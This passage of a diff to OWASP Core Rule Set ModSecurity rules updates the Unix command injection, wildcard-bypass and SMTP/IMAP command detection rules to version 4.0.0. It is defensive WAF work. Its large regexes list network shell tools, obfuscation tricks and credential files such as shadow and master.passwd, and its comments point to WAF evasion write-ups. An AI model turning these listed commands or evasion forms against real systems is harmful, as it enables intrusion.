*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))\b" \ + "id:932232,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932237.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932237 +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\v&\)<>\|]|pt(?:(?:itude)?[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|n?f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|ed|ftp|ql)?|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|opd|u(?:ppet[\s\v&\)<>\|]|shd)|y(?:thon[2-3]|3?versions))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:(?:facl)?[\s\v&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:ew)?[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|diff)|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:[\s\v&\)<>c\|]|h(?:o(?:[\s\v&\)<>\|]|ami|is)?|iptail[\s\v&\)<>\|])|a(?:ll|tch)[\s\v&\)<>\|]|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))(?:\b|[^0-9A-Z_a-z])" \ + "id:932237,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932238.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932238 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))" \ + "id:932238,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Bypass Rule 930120 (wildcard) ]=- +# +# When Paranoia Level is set to 1 and 2, a Remote Command Execution +# could be exploited bypassing rule 930120 (OS File Access Attempt) +# by using wildcard characters. # # In some other cases, it could be bypassed even if the Paranoia Level is set to 3. # Please, keep in mind that this rule could lead to many false positives. # -SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ +# The following two blog posts explain the evasions this rule is designed to detect: +# - https://medium.com/secjuice/waf-evasion-techniques-718026d693d8 +# - https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 + +SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \ "id:932190,\ phase:2,\ block,\ @@ -709,16 +1675,149 @@ SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ SMTP commands ]=- +# +# This rule prevents execution of SMTP related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932300. +# +# Rule 932301 is a stricter sibling of rule 932300. +# +# Regular expression generated from regex-assembly/932301.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932301 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:DATA|QUIT|HELP(?: .{1,255})?)" \ + "id:932301,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ IMAP4 Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932310. +# +# Rule 932311 is a stricter sibling of rule 932310. +# +# Regular expression generated from regex-assembly/932311.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932311 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:C(?:(?:REATE|OPY [\*,0-:]+) [\"-#%-&\*\--9A-Z\x5c_a-z]+|APABILITY|HECK|LOSE)|DELETE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|EX(?:AMINE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|PUNGE)|FETCH [\*,0-:]+|L(?:IST [\"-#\*\--9A-Z\x5c_a-z~]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|OG(?:IN [\--\.0-9@_a-z]{1,40} .*?|OUT))|RENAME [\"-#%-&\*\--9A-Z\x5c_a-z]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|S(?:E(?:LECT [\"-#%-&\*\--9A-Z\x5c_a-z]+|ARCH(?: CHARSET [\--\.0-9A-Z_a-z]{1,40})? (?:(KEYWORD \x5c)?(?:A(?:LL|NSWERED)|BCC|D(?:ELETED|RAFT)|(?:FLAGGE|OL)D|RECENT|SEEN|UN(?:(?:ANSWER|FLAGG)ED|D(?:ELETED|RAFT)|SEEN)|NEW)|(?:BODY|CC|FROM|HEADER .{1,100}|NOT|OR .{1,255}|T(?:EXT|O)) .{1,255}|LARGER [0-9]{1,20}|[\*,0-:]+|(?:BEFORE|ON|S(?:ENT(?:(?:BEFOR|SINC)E|ON)|INCE)) \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4}\"?|S(?:MALLER [0-9]{1,20}|UBJECT .{1,255})|U(?:ID [\*,0-:]+?|NKEYWORD \x5c(Seen|(?:Answer|Flagg)ed|D(?:eleted|raft)|Recent))))|T(?:ORE [\*,0-:]+? [\+\-]?FLAGS(?:\.SILENT)? 